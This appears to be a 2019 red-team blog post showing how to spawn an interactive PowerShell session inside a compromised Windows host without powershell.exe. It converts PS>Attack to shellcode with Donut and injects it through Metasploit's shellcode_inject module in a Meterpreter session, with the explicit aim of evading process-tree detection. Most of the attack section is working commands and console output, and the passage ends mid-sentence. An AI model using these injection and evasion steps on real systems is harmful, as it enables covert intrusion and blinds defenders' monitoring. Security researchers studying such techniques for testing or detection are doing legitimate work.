Oct 3, 2019
We Don’t Need PowerShell.exe: Meterpreter Edition!
I am keeping playing with the awesome Donut project and this time we are going to spawn a reflective, interactive PowerShell session without relying on
First, I suggest to read the following blog posts for a bit of context:
As shown in the previous post, we are now able to reflectively execute arbitrary binaries thanks to Donut within a Meterpreter session. Is it also possible to spawn a
powershell.exe in this way and evade any potential detection running on the host’s process tree? Let’s find it out!
If we generate a shellcode for
powershell.exe and try to inject it into a
notepad.exe process, nothing seems to be happening, or more precisely, the entire process exits. Unfortunately, at the time of writing, Donut only supports arguments passing for .NET EXEs and .NET DLLs so we cannot try to mess with the command line in order to keep alive our injected shell.
Are we done already?
Maybe there are some other shells that we can use in place of the built-in ones. Let’s try out with some open source .NET project that executes PowerShell commands without directly relying on
powershell.exe: say welcome to PS>Attack!
Let’s generate the shellcode with Donut:
$ donut -f /tmp/psattack.exe -a 2 -o /tmp/psattack.bin [ Donut shellcode generator v0.9.2 [ Copyright (c) 2019 TheWover, Odzhan [ Instance type : PIC [ Module file : "/tmp/psattack.exe" [ File type : .NET EXE [ Target CPU : AMD64 [ AMSI/WDLP : continue [ Shellcode : "/tmp/psattack.bin"
Now let’s move to Metasploit, spawn a Meterpreter on the target machine and proceed to use the module in the following way:
msf5 post(windows/manage/shellcode_inject) > use post/windows/manage/shellcode_inject msf5 post(windows/manage/shellcode_inject) > set SHELLCODE /tmp/psattack.bin msf5 post(windows/manage/shellcode_inject) > set SESSION 1 msf5 post(windows/manage/shellcode_inject) > run [*] Running module against MSEDGEWIN10 [*] Spawned process 6988 [*] Process found checking Architecture [+] Process is the same architecture as the payload [*] Injecting shellcode into process ID 6988 [*] Allocating memory in process 6988 [*] Allocated memory at address 0x1bc0ec60000, for 1044960 byte shellcode [+] Successfully injected payload in to process: 6988 [*] Interacting ( ( ) )\ ))\ ) ( * ) * ) ( ( ( /( (()/(()/( )\ ` ) /` ) /( )\ )\ )\()) /(_)/(_)((((_)( ( )(_)( )(_)((((_)( (((_)|((_)\ (_))(_))__)\ _ )\(_(_()(_(_()) )\ _ )\ )\___|_ ((_) | _ / __\ (_)_\(_|_ _|_ _| (_)_\(_((/ __| |/ / | _\__ \> / _ \ | | | | / _ \ | (__ ' < |_| |___/_/_/ \_\ |_| |_| /_/ \_\ \___|_|\_\ Loading... ... Set -ExecutionPolicy Bypass -Scope Process -Force [Version 1.99.1] Build Date 2/17/2018 2:45:08 PM If you'd like a version of PS>Attack thats even harder for AV to detect checkout http://github.com/jaredhaight/PSAttackBuildTool For help getting started, run 'get-attack' C:\Windows\system32 #> echo "we don't need powershell!" we don't need powershell! C:\Windows\system32 #> 'amsiutils' 'amsiutils' C:\Windows\system32 #> exit [*] Post module execution completed
It works, we have successfully spawned an interactive PowerShell session without actually spawning